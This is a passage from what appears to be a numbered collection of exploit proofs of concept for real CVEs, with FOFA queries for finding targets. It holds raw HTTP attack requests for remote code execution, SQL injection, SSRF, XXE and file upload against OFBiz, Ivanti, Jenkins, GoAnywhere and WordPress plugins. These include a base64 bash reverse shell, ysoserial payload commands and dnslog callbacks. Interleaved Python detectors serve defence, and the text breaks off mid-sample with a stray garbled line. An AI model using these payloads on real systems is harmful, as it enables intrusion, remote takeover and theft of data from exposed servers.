Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

Then fetch the file uploaded by this request (cciytdzu.txt) to confirm it was written:
GET /attachements/cciytdzu.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

The serializable extension makes the XML-RPC library deserialize the base64 value as a Java object, so any ysoserial gadget chain works as the payload. Note that 18.12.10 removed the XML-RPC endpoint, but the requirePasswordChange=Y login bypass used in the URL was only closed in 18.12.11 (see entry 96).

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Replace the placeholder in the POC above with the generated payload:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 Groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

The command output comes back inside the exception message, so the response to the first request shows the result of id directly.

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 136

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

The rememberMe cookie carries the serialized gadget chain encrypted with the Shiro key; the X-Token-Data header is the command the gadget reads and executes.

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

The script field is wrapped into a JavaScript function body without sanitization; the leading %7D (}) closes that function and the trailing %7B ({) re-opens it, so the Java call in between runs when the function is saved.

99. Ncast 盈可视 HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

The body is URL-encoded JSON: {"name":"ping","serviceName":"SysManager","userTransaction":false,"param":["ping 127.0.0.1 | echo hello"]}. The param value is passed to the shell unescaped, so the text after the pipe is what gets executed.

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

The JSON response contains the path the .php file was stored under.

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

The ../../ hop through the unauthenticated /api/v1/totp/user-backup-code/ path is the CVE-2023-46805 authentication bypass; the %3b (;) after keys-status/ is where the injected command starts, so a DNS or HTTP hit on the dnslog host confirms execution.

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>

The server-side SAML library resolves the ds:RetrievalMethod URI before the (bogus) signature is ever checked, so a callback to the dnslog host confirms the SSRF.

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 of the following XML. The parameter entity %watchTowr; is resolved while the DTD is parsed, so the out-of-band lookup of the dnslog host fires even though the document body is empty:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

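The note above says SAMLRequest is just the base64 of the XML, which is also what a defender needs to undo before any signature such as DOCTYPE or ENTITY can be matched. The Python below is an added example of mine, not code from the original article or from Ivanti: it decodes a SAMLRequest value the way a WAF hook or log processor would and reports XXE indicators, using the base64 value from the request above as its sample input. It handles both SAML bindings, the HTTP-POST binding (plain base64, as here) and the HTTP-Redirect binding (DEFLATE before base64); the function and rule names are my own.

```python
import base64
import re
import zlib

# SAMLRequest value copied from the CVE-2024-22024 request above (HTTP-POST binding).
PAGE_SAML_REQUEST = (
    "PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNo"
    "VG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg=="
)

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
# <!ENTITY name SYSTEM ...> or the parameter-entity form <!ENTITY % name SYSTEM ...>
EXTERNAL_ENTITY_RE = re.compile(r"<!ENTITY\s+(%\s*)?\w+\s+(SYSTEM|PUBLIC)\b", re.IGNORECASE)
SYSTEM_URI_RE = re.compile(r'SYSTEM\s+"([^"]*)"', re.IGNORECASE)


def decode_saml_request(value):
    """Return the XML carried by a SAMLRequest parameter.

    HTTP-POST binding is plain base64 (the request above).  HTTP-Redirect binding
    is raw DEFLATE followed by base64.  The decoder sniffs for a leading '<'
    instead of trusting which endpoint the value arrived on, so a deflated
    document pushed through the POST endpoint is still inspected.
    """
    raw = base64.b64decode(value)
    if raw.lstrip(b" \t\r\n").startswith(b"<"):
        return raw.decode("utf-8", "replace")
    return zlib.decompress(raw, -15).decode("utf-8", "replace")


def encode_redirect_binding(xml):
    """Inverse of the Redirect-binding path (DEFLATE, then base64)."""
    comp = zlib.compressobj(level=9, wbits=-15)
    data = comp.compress(xml.encode("utf-8")) + comp.flush()
    return base64.b64encode(data).decode("ascii")


def xxe_indicators(xml):
    """A SAML endpoint never needs a DOCTYPE; an external entity on top of it
    means the parser will be asked to fetch a URI, which is the XXE primitive."""
    return {
        "doctype": bool(DOCTYPE_RE.search(xml)),
        "external_entity": bool(EXTERNAL_ENTITY_RE.search(xml)),
        "system_uris": SYSTEM_URI_RE.findall(xml),
    }


def inspect_saml_request(value):
    """Decode and classify one SAMLRequest value; 'suspicious' means alert or block.
    Undecodable input is treated as suspicious rather than silently passed."""
    try:
        xml = decode_saml_request(value)
    except (ValueError, zlib.error) as exc:   # binascii.Error is a ValueError
        return {"suspicious": True, "reason": "undecodable SAMLRequest: %s" % exc}
    result = xxe_indicators(xml)
    result["suspicious"] = result["doctype"] or result["external_entity"]
    return result
```

Run inspect_saml_request() on the value from the request above and it reports doctype and external_entity as true with the dnslog URI in system_uris; a normal AuthnRequest reports neither. Matching on the decoded XML rather than on the raw parameter is the point: the base64 hides every keyword a naive WAF rule would look for.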
104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

Note the empty token: the handler returns the system status configuration without a valid session.

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

The injection is error-based: the md5 value appears inside the XPATH syntax error returned by updatexml.

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

The Blade-Auth token above is an admin JWT signed with the framework's default signing key; it is accepted only on deployments that kept that default. The query-string parameter name (not its value) is concatenated into the SQL, which is why the injection sits left of the "=".

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

The web-upload endpoint fetches the url parameter server-side to load it as a CSV, so internal addresses and cloud metadata endpoints are reachable through it.

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
Two requests share one Session id: the upload side carries the CLI arguments, the download side returns the command output. The upload body is shown as an escaped Python bytes literal (57 raw bytes).
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 57

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Response on the download side. The args4j parser expanded the @/etc/passwd argument into the file's lines, so the first line of the file leaks as the default value in the help text and a later line leaks in the "Too many arguments" error:
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
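The upload body above is Jenkins' plain-CLI framing, and reading it by eye is error-prone. The Python below is an added example of mine, not Jenkins code, that encodes a CLI invocation into that framing and decodes a captured body back into its frames, so that a defender can pull the arguments out of a captured /cli?remoting=false upload and flag any argument starting with "@", the args4j file-expansion that CVE-2024-23897 abuses. The opcode numbers (0 argument, 1 locale, 2 encoding, 3 start) are read off the captured bytes above and match Jenkins' PlainCLIProtocol; PAGE_UPLOAD_BODY is the body from the request above, decoded from its escaped form.

```python
import struct

# Opcodes of the Jenkins CLI framing used when remoting=false, as read off the
# captured upload body above: 0 = argument, 1 = locale, 2 = encoding, 3 = start.
OP_ARG, OP_LOCALE, OP_ENCODING, OP_START = 0, 1, 2, 3

# The upload body of the request above (decoded from the escaped literal).
PAGE_UPLOAD_BODY = (
    b"\x00\x00\x00\x06\x00\x00\x04help"
    b"\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd"
    b"\x00\x00\x00\x05\x02\x00\x03GBK"
    b"\x00\x00\x00\x07\x01\x00\x05en_US"
    b"\x00\x00\x00\x00\x03"
)


def _frame(op, text=None):
    """One frame: 4-byte big-endian length of the payload, 1-byte opcode, then
    the payload as Java's DataOutputStream.writeUTF (2-byte length + UTF-8).
    The start frame carries no payload, so its length field is 0."""
    payload = b""
    if text is not None:
        enc = text.encode("utf-8")
        payload = struct.pack(">H", len(enc)) + enc
    return struct.pack(">I", len(payload)) + bytes([op]) + payload


def build_upload_body(args, encoding="GBK", locale="en_US"):
    """Encode a CLI invocation: every argument, then encoding, locale, start."""
    body = b"".join(_frame(OP_ARG, a) for a in args)
    return body + _frame(OP_ENCODING, encoding) + _frame(OP_LOCALE, locale) + _frame(OP_START)


def parse_upload_body(data):
    """Walk the frames of a captured upload body; returns [(opcode, text), ...].
    A truncated trailing frame is dropped rather than raising, so a partial
    capture still yields the arguments seen so far."""
    frames, i = [], 0
    while i + 5 <= len(data):
        (n,) = struct.unpack(">I", data[i:i + 4])
        op = data[i + 4]
        payload = data[i + 5:i + 5 + n]
        if len(payload) < n:
            break
        text = payload[2:].decode("utf-8", "replace") if n >= 2 else ""
        frames.append((op, text))
        i += 5 + n
    return frames


def cli_arguments(data):
    """Only the argument frames, in order, as the CLI command would see them."""
    return [text for op, text in parse_upload_body(data) if op == OP_ARG]


def file_expansion_arguments(data):
    """Detection: args4j expands an argument of the form '@path' into the lines
    of that file.  An '@' argument in a CLI upload from an unexpected client is
    the CVE-2024-23897 signature, whatever command it is attached to."""
    return [a for a in cli_arguments(data) if a.startswith("@")]
```

Rebuilding the body with build_upload_body(["help", "@/etc/passwd"]) reproduces the captured bytes exactly, and file_expansion_arguments() on a captured upload returns the paths an attacker tried to read. Because the download side returns the leaked lines through error and help text, the upload side is the place to alert on.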
" Z( |+ ~+ h( |
110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

A 200 response carrying the initial account setup wizard means the page is reachable on an already-configured instance; the wizard creates an administrator account.

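The "..;/" segment in the request above is the part worth understanding: the servlet container strips ";"-delimited path parameters from each segment and resolves ".." before it maps the request, while a check that compares the raw URL against an allow-listed prefix (here the images directory) still sees a public path. The Python below is an added example of mine, not Fortra's code: servlet_normalize() approximates the container's normalization, naive_is_public() is a hypothetical prefix check standing in for whatever the product's filter did, and hardened_is_public() takes the same decision on the normalized path. The path constants are taken from the request above.

```python
from urllib.parse import unquote

PROTECTED = "/goanywhere/wizard/InitialAccountSetup.xhtml"
PUBLIC_PREFIX = "/goanywhere/images/"


def servlet_normalize(path):
    """Normalize a request path the way a servlet container does before it maps
    the request: drop the query string, percent-decode, strip ';name=value'
    path parameters from every segment, then resolve '.' and '..' without
    climbing above the root."""
    decoded = unquote(path.split("?", 1)[0])
    out = []
    for seg in decoded.split("/"):
        seg = seg.split(";", 1)[0]      # '..;' is just '..' once params are removed
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(seg)
    return "/" + "/".join(out)


def naive_is_public(path):
    """Hypothetical filter that decides on the raw URL (assumed for illustration)."""
    return path.startswith(PUBLIC_PREFIX)


def hardened_is_public(path):
    """Same decision, taken on the path the container will actually serve."""
    return servlet_normalize(path).startswith(PUBLIC_PREFIX)


def bypass_reaches_protected(path):
    """True when the naive filter waves the request through but the container
    resolves it to the protected wizard page: the shape of the POC above."""
    return naive_is_public(path) and servlet_normalize(path) == PROTECTED
```

Both the literal "..;/" form from the POC and the percent-encoded "%2e%2e;/" variant normalize to the wizard path, and hardened_is_public() rejects both. The general rule this illustrates: authorization checks must run on the same normalized path the servlet mapping uses, never on the raw request URI.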
111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Time-based: a response delayed by about 6 seconds confirms the injection.

112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

The type value is used as a column name inside backticks, so the closing backtick breaks out and the sleep(5) delays the response.

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The link parameter accepts any URL scheme: file:// reads local files, http:// turns the same handler into an SSRF.

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce. It is embedded in the inline bricksData script of any front-end page, so an unauthenticated GET is enough.
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce and execute the command. The queryEditor string is passed to eval() on the server; the throw is only there to return the command output in the error response.
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "value obtained in step 1",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket plugin file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

The request goes through /wp-admin/, so it needs an authenticated session cookie (not shown); {{rand8}} is a template placeholder for a random filename. The support_custom_img field is saved with the client-supplied extension, which is the defect.

117. WordPress LayerSlider plugin SQL injection
Version: 7.9.11 to 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

Passing id as an array with a "where" key lets the attacker supply the WHERE clause; admin-ajax.php accepts the action without login, so no cookie is required.
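Entries 105 to 107, 111, 114 and 117 above all place the injection in the query string, which means the attempts land in the web server access log. The Python below is an added example of mine, not from the original article, of a log scan for those payload shapes: it URL-decodes the request path repeatedly before matching, because the MasterStudy request encodes its parentheses and a double-encoded attempt (%2528) would otherwise slip past. The log lines are constructed for this example from the request paths in the entries above, and the rule names are my own. The NotificationX and Byzoro entries inject through the POST body, which an access log does not record; those need request-body logging or a WAF.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Payload shapes seen in the SpringBlade and WordPress entries above.
SQLI_RULES = {
    "error_based_xml": re.compile(r"\b(updatexml|extractvalue)\s*\(", re.IGNORECASE),
    "time_based": re.compile(r"\b(sleep|benchmark)\s*\(\s*\d+", re.IGNORECASE),
    "union_select": re.compile(r"\bunion\b[\s\S]{0,40}?\bselect\b", re.IGNORECASE),
}

# Combined log format: ip ident user [time] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log (not from the page); paths reuse the requests above.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:00:01 +0000] "GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1" 500 312
10.0.0.5 - - [12/Mar/2024:10:00:07 +0000] "GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1" 200 41
10.0.0.9 - - [12/Mar/2024:10:00:20 +0000] "GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1" 200 77
10.0.0.9 - - [12/Mar/2024:10:00:25 +0000] "GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id=12 HTTP/1.1" 200 1820
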